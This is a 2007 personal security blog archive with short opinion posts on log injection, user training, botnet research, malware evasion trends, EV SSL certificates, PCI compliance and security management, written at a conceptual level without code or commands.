I've just read an interesting paper from SIFT about log injection. It just remebered something that I think it's very interesting, but not very new. I remember a very good presentation from the Sensepost guys in Blach Hat US 2004.

They showed a number of ways to fool people running attack tools against their network. Among those things they mentioned how was easy to exploit tools that generate HTML reports. I wonder how deeply it can go. There are lots of security tools that generate beautiful reports on HTML. Are they safe from this kind of attack? And what about current log analysis and SIM/SIEM systems, are they prepared to deal with log injection attacks? I wouldn't bet too much on it.

Fix Users

I've been away from the blog for a few days (lots of work to do before Black Hat), but I took note of this little article from Dark Reading.

This is a discussion about the value and results of training users. I have mixed feelings about it. I really believe that training users must be part of a security program. However, I must also admit that there are limits about the effectiveness of this measure. Afterall, they are humans. You can make 80% of your users avoid problems, but 20% will certainly look for them even after months of training.

On the DR discussion, RSNake mentions that you need to keep harmful things far from the users. I agree with him, specially about the local admin. A big problem is that on most of the organizations there are lots of people with special privileges on their workstations, mostly IT staff. These are the most dangerous, as they use to have dangerous tools installed and critical information access. They also think that they don't need security training, what is different from the regular business user, that knows that there is risk and that he/she doesn't know how to avoid it.

I think that problems from users actions is like a big hole being covered from two sides. One of them is the least privilege and default deny concepts. We need to take them seriously. The other is security awaress. Both sides are not enough to close the gap alone, but increasing both together will achieve the goal.

Friday, February 23, 2007

Black Hat Europe - Here we go!

Finally I've found time to write about my new challenge: to speak at the BH Europe!

I'm working on a botnet trends review with André Fucs and Victor Pereira, my old friends in security research. We already built some interesting things to show there, and I hope that some others will be ready for the presentation too. It's our first international presentation, so we are a bit anxious about it. There will be a presention from Jose Nazario on Black Hat DC next week, it seems that he'll show that some things that we will be indicating as trends are already being detected. Good to know that we are on the right track.

Monday, February 12, 2007

Modern malware

I've just read a very interesting analysis of a new malware on SANS ISC. They've found a malware that downloads a password protected zip file from a HTTP location. The contents of this package is encrypted. The malware also uses a certificate to establish SSL connections to the IRC control servers, avoiding detection by network IDSes. Very interesting.

However, this one still doesn't solve the major obstacles for malware spreading. It tries to use a simple TCP outbound connection to talk to the servers, what is usually blocked by well configured firewalls. It would be far more difficult to block it if it tries to use SSL HTTP connections through a common proxy setup. The malware could search google for an specific string (or a dynamic string generated by some sort of pseudo-random number generator), finding dynamically the URLs where it could download its commands.

Another thing that is interesting on that analysis is the note from the ISC handler saying that most antivirus are still not able to detect this malware. He mentions defense in depth strategy, what is absolutely right. The use of anomaly detection is also an important feature to fight these new malware threats. I'd like to see how the SONAR technology from Symantec would react against this particular case.

Tuesday, February 6, 2007

Other view about anomaly-based detection

I am a huge fan of anomany-based detection, instead of using the old and innefective signature-based. I'm always saying that about IDS and antivirus. However, it's always good to see different opinions and information. I've found this article very interesting, as it shows some problems related to anomaly-based detection. It's a very valuable reading.

ROI

I've heard last week, on a Executive Board meeting, a CEO complaining about IT budget requests that he was receiving trying to justify the expenses by showing a ROI. He mentioned that almost all were wrong, as they were based on cost avoidance and not cost reduction. Although none of them were related to security, I found his comments extremely pertinent to the famous ROSI discussion. I'm glad to see that my personal opinion about it is aligned with what the CEO of the company that I work for thinks.

Security monitoring - NSM and Logs

I really like to work with logs when the subject is security monitoring. In fact, all my Master Thesis is based on log analysis. However, Richard Bejtlich is right about some weaknesses on doing it only based on logs. He is quite right on saying that the absence of logs does not confirm integrity. He proposes the use of network sensors and other tools and procedures (in what he normally calls Network Security Monitoring, NSM) to complement the security monitoring process. It's a very good concept.

Silver Bullet Podcast

The "Silver Bullet" podcast, from Gary McGraw, is very good, and you probably already know about it. Imagine now an episode with:

  • Bill Pugh, Professor at University of Maryland, static analysis for finding bugs
  • Li Gong, GM at Microsoft, MSN in China
  • Marcus Ranum, CSO of Tenable Network Security, security products trainer
  • Avi Rubin, Professor at Johns Hopkins, electronic voting security
  • Fred Schneider, Professor at Cornell, trustworthy computing
  • Greg Morrisett, Professor at Harvard, dependant type theory
  • Matt Bishop, Professor at UC Davis, computer security
  • Dave Wagner, Professor at Berkeley, software security and electronic voting
This is very, very worth listening to!

Thursday, February 1, 2007

EV SSL - Was it really necessary?

There is a new security magic solution! It's called Extended Validation SSL certificates.

For me, this is extremely dumb. First, do you really know what kind of security a SSL certificate can provide?

SSL certificates can't provide security by themselves. The certificate role during a SSL session is to provide a way to ensure the identity of the peers, normally the server only. They are digitally signed by a company that is trusted by both parties in the communication.

What? Who is this 3rd party that I trust? I don't remember saying that I trust nobody to do that!

These companies pass through a process that allows them to be pre-installed on the most used browsers in the market. When you install IE or Firefox, for example, you are implicitly trusting on these companies to verify the identity of the web sites that you access through "https". This is that old "lock picture in the corner" thing, if it's there it means that the identity of site that you are accessing was verified by one of those companies (well, in fact it's not so simple, you have the choice to trust whoever you want, but let's keep it simple). If you click on that lock you will see the digital certificate that the site is presenting to you, with some information about the organization that acquired the certificate.

These companies that you trust are the Certificate Authorities. They need to check the identity of the organization that is requesting a certificate to put in its web site before issuing it. This verification process varies from each company to another.

That lock thing, however, was not being enough to avoid phishing sites. So some companies decided to create a "certificate on steroids", called EV-SSL. This new certificate could only be issued by CAs after a more thorough identity verification process, to avoid that company A will create a certificate for its site with the name of company B.

Besides that, new browsers would show more information about the web site being visited, as well as showing the address bar with a green color. That's nice. The company wanting to use it on its site just need to replace its current SSL certificate by an EV-SSL certificate paying an additional fee and passing through the verification process.

OK, so the EV-SSL brings more security by two ways:

- Better identity verification before the certificate issue
- More information about the site being visited presented by the browser

Hey, did somebody noticed that there wasn't a need to create (and to make companies pay more) a new kind of certificate to do that??? Why didn't the CAs just start following more strict verification processes for the regular SSL certificates? I bet that if Microsoft start threatening those CAs to remove their certificates from the Trusted Root CAs from IE if they don't improve their processes it would have the same effect. That green bar and more identity information presented could be done for any SSL certificate too.

But the CAs wouldn't be earning a few hundred bucks from every company with a SSL website with this approach...

Friday, January 26, 2007

PCI, PCI, PCI! OK, but are they focusing at the right things?

Reading this is almost clear that PCI is really the standard of the moment. However, I'm still impressed about how security professionals and vendors dealing with it seem to be missing the point about what is really important and needs to be done first.

One of the main security concepts is risk management. As you can't solve all your security problems, you should start by solving the worst. PCI, however, doesn't mention anywhere a risk assessment to be done aiming at credit card data. There are 12 requirements, all of them with the same importance and at the same level. The results of this is that companies are struggling with security solutions without properly assessing if they are trying to solve the worst problems on their control framework.

Everybody is talking about encryption. Encrypt all transmissions, encrypt data at rest, etc. However, did anybody verify if encryption would be the solution for the main data leaks that happened on the last years? Except for those backup tapes and laptops, I really doubt it.

PCI should turn into a more modern framework, with a phased approach of assessing first to identify the major risks and then defining a security strategy. It can list the minimal points that need to be covered, but it's essential to include a prioritization and planning phase. PCI enforces the existence of specific controls. The appropriateness and priority of them, however, is not considered.

The 1.1 version is, in fact, better than 1.0 as it included the concept of compensatory controls and applications security. I still think that it should include more things about security processes. The standard mentions a "security policy". Why not a Security Program?

Tuesday, January 23, 2007

Best Practices?

Post from Anton Chuvakin, commenting a post from another blog, is one of those to hang on the wall.

The posting that he talks about got a point when it says that there are lots of people trying to follow best practices and standards instead of doing real security. I think it's partially right. If the process is lacking intelligence it won't work anyway. And I agree that there are some "best practices" that are not so best.

But Chuvakin is entirely right to say that using checklists is a good approach when previously there wasn't an approach at all.

They also agree on something that I always fought wherever I worked: "real security is a creative act". Yes, this is not a monkey job! A lot of people believe that perfect security is to create the perfect checklist and put it to be used by less qualified (and cheaper) workers. Not exactly like that. I've seen with my own eyes the difference between the same checklist being used by competent and not-so-competent people. Totally different results.

Some people say that this is trying to make mystery about the job, using "talent" to make it appear bigger than it really is. I think they are exaggerating and sub estimating the problem of doing real security. Without intelligence and knowledge you can't go far. But it's not only that. A standard or "best practice" is just like any other tool for specialists, like the scalpel for the plastic surgeon. When it's handled by the specialist, it can make miracles. When handled by the unskilled, do only harm.

Symantec and SONAR

Symantec bought some time ago a company called Whole Security, which has a very interesting malware detection product that wasn't signature based (it was behaviour based). It happened so much time agor that I thought Symantec was going to simply kill the product. But now there are news that they are putting WS technology in the Norton Antivirus, with a new name, SONAR. Very good, I really want to see this thing working!

They are watching us!

After reading the first part of The Pragmatic CSO I'm convinced that Mike Rothman is just like Scott Adams: THEY ARE WATCHING US!!!

Daily Dilbert from last week shows this power of Mr. Adams here and here.

Two parts from P-CSO caught my eye today. The first was one of those "addicted CSO" dialogues that Mike built so well. The first one (you can check this on the introduction that is freely downloadable from the site) has a part where the CSO mentions the increasing difficulties that he is finding to approve his investments, and the time that he spends with auditors, meetings and assembling business cases. That's sooooo reality!!

The other one was a note about the "Shadow IT", those systems created by business units when the Corporate IT doesn't address their needs. This is also very common, I find a couple of those every day. A good thing about getting business support is that they start to call you when those things are being born. You have the chance to make them start right.

Sunday, January 21, 2007

New MS VPN Protocol - or new backdoor covert channel?

I've just read in Network World that MS is developing a new VPN protocol that works over HTTP, to avoid the known problems of making tunnels work through networks with NAT, firewalls and Proxies in place.

I don't question the need for this when talking about the tunnel functionality. The SSL VPNs grew so much exactly to address these questions. In fact, the article in NW mentions that it will be a SSL VPN. However, I can already see problems with malware using it as covert channel to communicate with its master. Being a encrypted protocol, chances of detection by network monitoring will be very low.

But why be worried about it if we already have this feature in other products? Because putting it in the OS will make it easier to use by malware authors. I'm a very bad programmer, but the very little that I know is enough to use the very simple API from Windows features in easy programming languages like VB.

Not that I'm saying it's a bad thing to do. It's common to create features than can be used for good and evil. As security professionals, however, we need to think about how we will deal with the bad part. Disabling the ability to use the protocol by GPO settings could be a option.

Friday, January 19, 2007

Compliance solution in-a-box

My job to comment on security things is much easier now that I'm reading Mike Rothman's news. From today's posting:

"There is no compliance "solution"
Maybe I'm just grumpy, but the anonymous CJ Kelly is annoying me. Yesterday it was her jumping on the printing security risk bandwagon and today it's making some silly statements about compliance. Let's get one thing straight. There is no compliance SOLUTION. It's not something you can buy, not for any price. You need a strong security program as the foundation, and a way to document what you do and why. That's Step 12 of the P-CSO process. She points to Ogren's post (which is right) about the fact that much of the regulation has had little impact on the base level of security of an organization. And it's because a lot of organizations feel no pain because enforcement is a joke. But to say that the issue with compliance is the vendors not bringing forward complete solutions makes my blood boil. Just another example of someone wanting to solve a problem by open up the checkbook. Sorry CJ, it doesn't work like that.
http://www.computerworld.com/blogs/node/4392"

One thing that's quite funny is to watch security boxes vendors saying that their product is 100% SOX Ready. WTF does that mean??? That or something like "with my product being SOX compliance is easy". Whow, I didn't knoew they are selling silver bullet boxes.

PCI is another standard that is suffering from the same evil. PCI has 12 requirements, from access control to data encryption. You can see companies offering vulnerability scanners as the final solution to PCI compliance. My biggest worry is that if they keep pushing these lies is that probably someone is buying it. What kind of CSO do we have out there?

Tuesday, January 16, 2007

Security Theater

Bruce Schneier mentioned in his blog this post in Slashdot about security theater. I've saw some discussions about it mainly over the point of removing people from physical security points of control. But what really caught my eye was the comment about different audit procedures for code related to new releases and patches.

Has anyone conducted a study to check if code audit is a viable security control for non-software vendor companies? I mean, almost all big companies that don't sell software have internal development teams providing maintenance and new features for the software they use. Does the process of auditing the code for security vulnerabilities bring enough security to compensate its cost?

I believe that the answer for this question is based on several variables, like the amount of changes in the code, the exposure of the software to motivated and skilled attackers and the presence of easier ways to exploit the process which is supported by the software.

Without an analysis of these aspects I think that code auditing processes can be more expensive than accepting the risk, or even becoming just more security theater.

Friday, January 12, 2007

Classification products

Sometimes we are so excited about an idea that we forget to check if someone has got the same one first. Well, I was thinking about removing the dust from my programming books to build something, but suddenly I decided to check Google first.

Here is exactly what I thought: Tools to help on classifying information.

Thursday, January 11, 2007

Smart defense in depth example

We can see a very good example of Defense in Depth being used in Microsoft by reading this note from Michael Horward.

They are not only training the developers to produce better code, they are also using tools to avoid the residual mistakes becoming vulnerabilities. Smart.

Tuesday, January 9, 2007

About Web Applications Security

Imperva recently published a very good article about web applications security.

The article shows numbers about the type and severity of the vulnerabilities usually found in web applications, as well as how this matter is evolving from 4 years ago until now.

The article is a very good resource for those that don't have a regulatory piece like PCI to push web application security in their companies. Even for those that are fighting that war "penetrate and patch vc security built in" the text is very important, as it shows the very high numbers of re-tests that showed critical vulnerabilities and the very small number of them that showed no vulnerabilities at all.

The only problem of the article is that it is from a company that sells application firewalls. Even with all the interesting data presented, the conclusio seems to be something too product-driven. If one tries to use it as a resource to justify developers trainning and security throughout the application life-cycle he may end up on getting only budget for another miracle box.

Monday, January 8, 2007

Very very good blog

Just on this weekend I stumbled upon Mike Rothman's blog. Just by reading two days of his postings and I'm already planning to buy his PDF book "The pragmatic CSO". First because I already have good feelings about anything that uses the word "pragmatic". Second, his postings are so intelligent that I'm really wiling to see what advices he has prepared for a CSO like me.

Today he made a brilliant observation about the discussion about which kind of threat is more important, internal or external. Usually I end up on reading and researching more about internal threats because I think the problems involved are more interesting, but he's made a point on saying that it doesn't matter if it's internal or external, but if it can reach your business systems. one of his phrases: "Enough of these ridiculous insider vs outsider delineations. Protect your damn business systems and the nomenclature will work itself out.". Really loved that.

I'll keep reading it. The format of his comments ("top blog postings") is exactly what was my intention to do here. Unfortunately I have to spent a few more minutes when I'm writing in english, so I'm not able to keep the postings coming. Have to change that this year.

Saturday, January 6, 2007

Quote of the week

I've just started reading Mike Rothman's blog, but it seems to be a incredible source of good insights and information. He already won my quote of the week award with this gem about vulnerability severity levels that we usually see in advisories:

"The only severity score that is important is the one you come up with after figuring out if you are exposed."

Perfect. I'm almost believing that the 97 bucks for his book are worthy :-)

He also mentioned Dilbert from 31/12. I'm facing some weeks with dialogs like that since last month :-(